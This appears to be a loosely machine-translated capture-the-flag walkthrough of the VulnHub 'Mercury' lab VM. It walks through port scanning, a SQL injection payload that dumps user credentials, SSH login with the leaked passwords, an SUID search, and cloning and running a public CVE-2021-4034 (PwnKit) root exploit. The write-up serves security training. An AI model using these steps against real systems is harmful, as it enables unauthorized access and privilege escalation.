THE PLANETS:MECURY

Get ready

attack ： kali
Drone aircraft : THE PLANETS:MECURY NAT 192.168.91.0 Network segment
Download link :
https://www.vulnhub.com/entry/the-planets-mercury,544/
The test found that the data could not be obtained normally IP, Therefore, enter the rescue mode to modify the network card configuration file .
Press and hold for a long time shift The following screen is displayed :

Press in the current screen e

As shown in the figure , take ro quiet Follow and change to ： rw signie init=/bin/bash

Then press ctrl + x Enter the system enter the system , Input : lsb_release -a System release
As shown in the picture Ununtu 20.0.4, as everyone knows ,Ubunut Modified in the new version IP The address profile is /etc/netplan/*** （*** According to the actual situation, what the file name is ） Check the network card name first

by ens33, Now modify the configuration file
vi /etc/netplan/00-installer-config.yaml

As shown in the figure The original wrong network card name is changed to ens33, This has been modified . Now just restart linux Start normally .

Information collection and utilization

The host found

As shown in the figure, the... Of the target is obtained IP Address ： 192.168.91.172

Port scanning

nmap -sV -p- -A -sS 192.168.91.172 -oN nmap_mercury.txt

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-09 17:05 CST
Nmap scan report for 192.168.91.172
Host is up (0.00092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * {
     padding:0; margin:0; }
|     body * {
     padding:10px 20px; }
|     body * * {
     padding:0; }
|     body {
     font:small sans-serif; background:#eee; color:#000; }
|     body>div {
     border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span {
     font-size:60%; color:#666; font-weight:normal; }
|     table {
     border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Check the scan results carefully , Only open 22,8080 Two ports , among 8080 by python 3.8 The pages that make up .
http://192.168.91.172:8080/

Try whether it is turned on DEBUG, Casually construct a wrong url that will do

As shown in the figure, it can be concluded that Django Developed web pages , There is Routing has : robots.txt ,mercuryfacts/, Visit them , At the same time, scan the contents

Directory scanning

dirb http://192.168.91.172:8080/
By default, only... Can be scanned robots.txt However robots.txt There is nothing in the agreement
visit ：
http://192.168.91.172:8080/mercuryfacts/

As shown in the figure mercury ？
Get into Load a fact The page is as follows
http://192.168.91.172:8080/mercuryfacts/1/

As shown in the figure , Pay attention to the numbers 1, After testing 1-8 You can display content , Guess there is sql Inject , verification ：
http://192.168.91.172:8080/mercuryfacts/1’/

If the report is wrong , Then prove sql Infuse being . After testing, the following contents are obtained :
http://192.168.91.172:8080/mercuryfacts/44%20union%20select%20group_concat(username,0x2d,password)%20from%20users/

Got a few usernames and passwords . Then try whether ssh land .
After testing, it is found that the last user webmaster-mercuryisthesizeof0.056Earths ssh Landing successful

Information gathering

As shown in the figure ： The first... Exists in the current directory flag
cat /etc/passwd | grep "/bin.bash"
As shown in the figure ： except root Use outdoors , Another three users have /bin/bash Namely : mercury,webmaster( Current login user ),linuxmaster.

flag 1

[user_flag_8339915c9a454657bd60ee58776f4ccd]

According to the old routine , the last one flag Generally in root Under the table of contents , Therefore, it is necessary to raise the right
stay mercury_proj/notes.txt It has the following contents

As shown in the figure, it is obvious ：linuxmaster For the user to be switched later , The code is base64 code bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== Decode it to get :
mercurymeandiameteris4880km

So get the username and password : linuxmaster:mercurymeandiameteris4880km

Switch users to linuxmaster

As shown in the figure, the switch is successful .

SUID extract

find / -perm -u=s -type f 2>/dev/null

After searching, we found The last one, the content in the red box, has a right raising vulnerability , And it was only last year that the leak was exposed ：
CVE-2021-4034
git clone https://github.com/berdav/CVE-2021-4034

Get into CVE-2021-4034 Folder and execute make command

Will generate cve-2021-4034 Executable file , Just run directly
./cve-2021-4034

As shown in the figure, the right is successfully raised , Get root jurisdiction , Now look for it root In the catalog flag that will do

As shown in the picture, I got flag, This series of target planes is very interesting .

summary :

1. sql Inject
2. cve-2021-4034